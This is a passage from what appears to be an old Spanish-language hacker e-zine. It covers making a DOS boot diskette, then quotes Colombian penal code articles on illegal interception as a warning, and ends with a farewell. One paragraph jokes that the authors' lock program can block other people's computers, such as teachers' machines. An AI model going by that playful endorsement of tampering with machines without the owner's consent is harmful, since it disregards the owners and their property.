no sabaneen como se hace un disco de inicio se los explicare, lo primero que 
hay que hacer es abrir una ventana de DOS situarse en C:\ , meten un diskette 
en A:\ y escriben en C:\ lo siguiente:" format a:/s " luego dirá que metas un 
disco y que des enter, como  ya lo tienes pues das enter, esperas un momento 
y cuando te pregunte por la etiqueta escribes: SYSTEMDISK y enter y listo!!

Bueno las utilidades del programa son muchas, desde proteger tu computador, 
hasta bloquear un computador ajeno (es divertido ver los passwords que 
tratan de poner los profesores de sistemas cundo se encuentran frente a tu p
rograma... {por eso se llama jeje} :-) ).

lo que dije de los virus al principio es que ya sabiendo como manipular el 
untoexec pueden controlar muchos virus que lo único que hacen es iniciarse 
con güindows (como el nuestro) y así librarse de ellos.

bueno, no siendo mas por ahora espero que les halla gustado este artículo 
y que lo disfruten y apliquen.....hasta pronto.......


K@LVO. 

            
               kk  kk  @@@@@@   ll     vv       vv  00000000
               kk kk   @@  @@   ll      vv     vv   00    00 
               kkk     @@@@@@   ll       vv   vv    00    00  
               kk kk   @@  @@   ll        vv vv     00    00  oo
               kk  kk  @@  @@   lllllll    vvv      00000000  oo  



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                             4. CODIGO PENAL                                @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@





Con este articulo se pretende alertar a cada uno de ustedes a que
esten consientes de sus actos y lo que ellos podrian repercutir
si llegacen a ser atrapados haciendolos.


¨CODIGO PENAL DE COLOMBIA 1981 SEGUNDA EDICION CAPITULO 5¨


ARTICULO 288: Violacion ilicita de comunicaciones.

El que ilicitamente sustraiga, oculte, extravie, destruya, intercepte,
controle o impida una comunicacion privada dirigida a otra persona, o
se entere indebidamente de su contenido incurrira en arreto de 6 meses
a 2 años, siempre que el hecho no constituya delito sancionado con pena
mayor.La pena mayor es de 8 meses a 3 años.
Si el autor del hecho revela el contenido de la comunicacion,o la emplea
en provecho propio o ajeno o con perjuicio de otro, la pena sera prision
de 1 a 3 años si se tratara de comunicacion privada y de 2 a 5 años si
fuere oficial.

ARTICULO 289: Divulgacion de documentos resevados.

El que en provecho propio o ajeno o con perjuicio de otro dibulgue o
emplee el contenido de un documento que deba permanecer en recerva,
incurrira en arresto de 6 meses a 2 años, siempre que el hecho no
costituya delito sancionado con pena mayor.




POR: BLACKWOLF






@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                              5. DESPEDIDA                                  @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@





Y hasta aqui llegamos!!
Espero que en este primer E-ZINE hallan encontrado
informacion sobre temas poco tratado en otros ezines por el estilo de este.
Esperamos que se animen a escribirnos sobre sus sugerencias y preguntas a
nuestro correo oficial y nos colaboren con todo lo que nos quieran ayudar y
hagan que esta locura sea todo un exito.
Ademas como dice el CONDE VAMPIRO de el jjf Puedes pensar que tu articulo 
sera muy basico pero siempre hay alguien por debajo que no lo sabra.


NOS VEMOS EN NUESTRO PROXIMO NUMERO DE ESTE TU EZINE C.C.H.

ESTAMOS EN CONTACT!!!

POR: BLACKWOLF




@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@                                  FIN                                       @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
